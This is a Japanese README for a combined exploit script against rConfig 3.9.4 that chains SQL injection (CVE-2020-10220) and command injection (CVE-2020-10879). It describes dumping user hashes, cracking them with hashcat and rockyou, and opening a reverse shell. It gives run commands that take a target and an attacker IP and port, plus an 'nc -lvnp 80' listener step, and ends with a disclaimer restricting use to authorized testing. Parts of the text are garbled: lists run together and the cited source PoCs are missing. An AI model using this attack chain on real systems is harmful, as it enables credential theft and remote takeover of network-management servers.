
rConfigの結合PoCs: SQL Injection (CVE-2020-10220) & Command Injection (CVE-2020-10879)
このPoCはrConfigバージョン3.9.4を対象とし、SQLインジェクションとリモートコマンドインジェクションの脆弱性を組み合わせたエクスプロイトを実証します。以下の処理を自動化します:
rockyouワードリストおよびbest64.rulesを用いたパスワードハッシュのクラック試行このスクリプトは、以下の2つのオリジナルPoCを基に結合したものです:
自動クラックとオプションのシェル起動を実現するために修正が加えられています。
requestsライブラリ(pip install requests)hashcatがインストールされていること/usr/share/wordlists/rockyou.txtに配置されたrockyou.txtワードリスト(または同等のもの)/usr/share/hashcat/rules/best64.ruleのhashcatルールファイルユーザーとハッシュのみをダンプする場合:
python3 rConfig_rce.py https://ターゲット
ユーザーのダンプ、パスワードのクラック、およびRCEを試行する場合(リバースシェル用の攻撃者IPとポートが必要):
python3 rConfig_rce.py https://ターゲット 攻撃者_IP 攻撃者_ポート
adminアカウントを優先的に使用します。nc -lvnp 80)を実行し、リバースシェルを受信できるようにしてください。このツールは、許可されたセキュリティテストおよび教育目的のみを意図しています。許可なくシステムに対して不正に使用することは違法であり、非倫理的です。